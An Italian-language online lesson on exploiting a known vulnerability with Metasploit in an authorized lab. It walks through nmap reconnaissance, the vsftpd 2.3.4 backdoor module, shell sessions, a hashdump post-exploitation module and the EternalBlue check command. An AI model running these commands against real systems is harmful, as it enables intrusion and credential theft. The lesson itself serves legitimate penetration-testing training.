0Pricing
Cyber Security Academy · Lezione

Sfruttare una vulnerabilità nota

Utilizzate un modulo di exploit contro un obiettivo vulnerabile in un laboratorio e interpretate l'output della sessione.

Sfruttare una vulnerabilità nota è una lezione Cyber Security Academy gratuita su CoddyKit. Questa è la lezione 2 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cyber Security Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cyber Security Academy include 4 lezioni in totale.

Etica e autorizzazione prima di tutto

Lo sfruttamento è legale solo nei confronti di sistemi di Sua proprietà o per i quali dispone di un'autorizzazione scritta esplicita a eseguire test. Tutti gli esempi qui riportati sono destinati ad ambienti di laboratorio autorizzati. Lo sfruttamento non autorizzato è un reato.

Raccomandazioni per la configurazione del laboratorio

Utilizzi VM volutamente vulnerabili: Metasploitable2/3, DVWA, macchine VulnHub oppure HackTheBox/TryHackMe per esercitarsi legalmente. Non esegua mai test su sistemi di produzione o sistemi reali senza un documento di definizione dell'ambito firmato.

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

Ricognizione prima dello sfruttamento

Esegua sempre l'enumerazione prima dello sfruttamento. Conosca la versione esatta del servizio, il sistema operativo e il contesto prima di selezionare un exploit. Una versione errata comporta un exploit fallito o il blocco del sistema.

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

Selezione dell'exploit corretto

Effettui la ricerca in base al nome e alla versione del servizio. Preferisca i moduli con livello Excellent o Great. Legga le informazioni con info per confermare che la piattaforma di destinazione e l'intervallo di versioni corrispondano.

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Configurazione ed esecuzione dell'exploit

Imposti RHOSTS (destinazione remota), LHOST (il Suo IP per le connessioni reverse), LPORT (la porta di ascolto), selezioni un payload ed esegua il modulo. Verifichi la creazione della sessione o la presenza di messaggi di errore.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

Interpretazione dei risultati

Un exploit riuscito apre una sessione. Gli exploit falliti mostrano messaggi di errore: connessione rifiutata (la porta non è aperta), exploit non riuscito (versione errata), nessuna sessione creata (il payload non è riuscito a connettersi al mittente).

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

Interazione con una sessione

Dopo lo sfruttamento, interagisca con la sessione utilizzando sessions -i . Le sessioni shell di base offrono un terminale; le sessioni Meterpreter forniscono un'API completa.

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

Sospensione e gestione di più sessioni

Prema Ctrl+Z per mettere una sessione in background e tornare a msfconsole. In questo modo può gestire più sessioni o eseguire moduli di post-sfruttamento su una sessione specifica.

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

Comando check

Molti moduli exploit implementano un comando check che verifica se la destinazione è vulnerabile senza sfruttarla effettivamente. Esegua sempre prima check, quando disponibile.

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

Considerazioni sull'affidabilità degli exploit

Gli exploit possono arrestare i servizi, attivare avvisi o lasciare tracce nei log. Nelle valutazioni degli ambienti di produzione: pianifichi gli exploit nelle fasce di minore attività, predisponga un piano di rollback e verifichi l'esistenza di backup prima di eseguire qualsiasi operazione distruttiva.

Documentazione dello sfruttamento

Registri: data e ora, IP e porta della destinazione, modulo exploit utilizzato, numero CVE, payload utilizzato, sessione ottenuta e prove (screenshot o output del terminale). Questa è la prova della vulnerabilità da inserire nel report.

Verifica rapida

Che cosa fa il comando "check" di Metasploit?

Riepilogo: sfruttamento delle vulnerabilità

Lo sfruttamento etico segue un flusso chiaro: ottenere un'autorizzazione scritta, eseguire con attenzione l'enumerazione, selezionare l'exploit corrispondente, leggere le informazioni del modulo, eseguire prima check quando disponibile, procedere con l'esecuzione e documentare tutto. Non effettui mai attività di sfruttamento senza autorizzazione: la competenza tecnica e il limite etico sono inseparabili.

Domande Frequenti

La lezione «Sfruttare una vulnerabilità nota» è gratuita?

Sì — il testo completo di «Sfruttare una vulnerabilità nota» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cyber Security Academy, passa a CoddyKit PRO. Il corso Cyber Security Academy include 4 lezioni in totale.

Cosa imparerò in «Sfruttare una vulnerabilità nota»?

Utilizzate un modulo di exploit contro un obiettivo vulnerabile in un laboratorio e interpretate l'output della sessione. Eserciti Cyber Security Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.

Ho bisogno di esperienza per iniziare Cyber Security Academy?

Non è richiesta alcuna esperienza precedente. Cyber Security Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 2 di 4.

Quanto tempo richiede la lezione «Sfruttare una vulnerabilità nota»?

La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.

Posso scrivere ed eseguire codice in questa lezione Cyber Security Academy?

Sì. Ogni lezione Cyber Security Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.

Tutte le lezioni di questo corso

  1. Architettura di Metasploit e msfconsole
  2. Sfruttare una vulnerabilità nota
  3. Payload: staged e stageless, Meterpreter
  4. Post-exploitation: pivoting e persistenza
← Torna a Cyber Security Academy